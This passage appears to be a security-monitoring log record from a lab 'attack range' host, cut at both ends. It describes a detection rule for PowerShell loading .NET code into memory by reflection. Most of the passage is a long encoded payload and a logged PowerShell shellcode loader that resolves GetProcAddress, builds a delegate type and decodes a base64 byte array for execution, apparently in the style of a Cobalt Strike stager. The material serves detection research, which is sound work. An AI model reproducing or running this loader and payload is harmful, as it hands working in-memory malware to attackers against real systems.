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 to load .net code in memory with EventCode 4104 in host exchange01.attackrange.local", risk_object="'S-1-5-18'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664805332, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="exchange01.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) } function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] ) $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') return $var_type_builder.CreateType() } [Byte[]]$var_code = [System.Convert]::FromBase64String('bnlxZssjIyMjeKr8dqrGouBqXyMj3PBL05aBdUsnIyMjdNzzIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj0yMjIy08mS0jlyruApsib+4Cd0tKUANTUUxEUUJOA0BCTU1MVwNBRgNRVk0DSk0DZ2xwA05MR0YNLi4pByMjIyMjIyM4vpzufN/yvXzf8r183/K9wZBkvX3f8r1ijXa9VN/yvWKNZ71o3/K9Yo1xvf/f8r1bGYm9d9/yvXzf872y3/K9Yo17vbff8r1ijWC9fd/yvWKNY7193/K9cUpAS3zf8r0jIyMjIyMjIyMjIyMjIyMjc2YjI28iJyO9Dh1DIyMjIyMjIyPDIyGCKCIqIyNxISMjRyIjIyMjI9lCIiMjMyMjI1MhIyMjIzMjMyMjIyEjIyYjIyMjIyMjJiMjIyMjIyMjwyAjIycjIyMjIyMhI2MiIyMzIyMzIyMjIzMjIzMjIyMjIyMzIyMjsyggI3IjIyPH2SEjRyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyPjICPzNSMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMT1iEjYyMjIyMjIyMjIyMjI1MhIzMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNV0ZbVyMjI3ZyISMjMyMjI3EhIyMnIyMjIyMjIyMjIyMjIyMDIyNDDVFHQldCIyPCuCMjI1MhIyO/IyMjdSEjIyMjIyMjIyMjIyMjYyMjYw1HQldCIyMjA4QjIyMzICMjASMjI9EhIyMjIyMjIyMjIyMjI2MjI+MNUUZPTEAjIz89IyMj4yAjIwMjIyM3ICMjIyMjIyMjIyMjIyNjIyNhIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI3aoz3B1qBbPViAzqOWm1VcfoBsiVg6odiuuayepORk6Vjun+FczqXkiGXoiVi9hYWJip/hWxRDqyCY46qD63KbqV2iooydjIyOm41bnqOWm1VcsoBsjVxWooydjIyOm41bSdJgrYyMjcMvEFCIjcKjbSSN0yzSRIiOg5zOgBCOqlCdjIyOqHs9WIDOo5Hx9eH7gdqjPoM8/cHV0SyNDIyPL53UjI5wjAyMjqNN0dcuHdCMjqPt0dap+28u7dCMjdHWqZt/LrXQjI9xWL6pm19xWK65mx3PL1nUjI65mx3RzyzV7IyN03FbfcMs/EiMjqH7XrmbHdHPL3HQjI6DnZ9xW38va3dzcqPt0rmAnc9xW2+QgIiMjI8vMEyMjdKLgJwMjI3DcVtfL/BMjI6DnP8tWdSMjfH146uB2qM9ycHV0qB7PViAznSMDIyN1qPvLIRQiI6huK3VzcKpm3+UnKCPLhRMjI6DnM8h1oBwiVmiobt+ufCeo4KkzGTJWO6fxVzOpcyIZciJWL2NjYmKn8VbFEOPIJjjjoPvcpuNWPwIkdXNwy8uTIi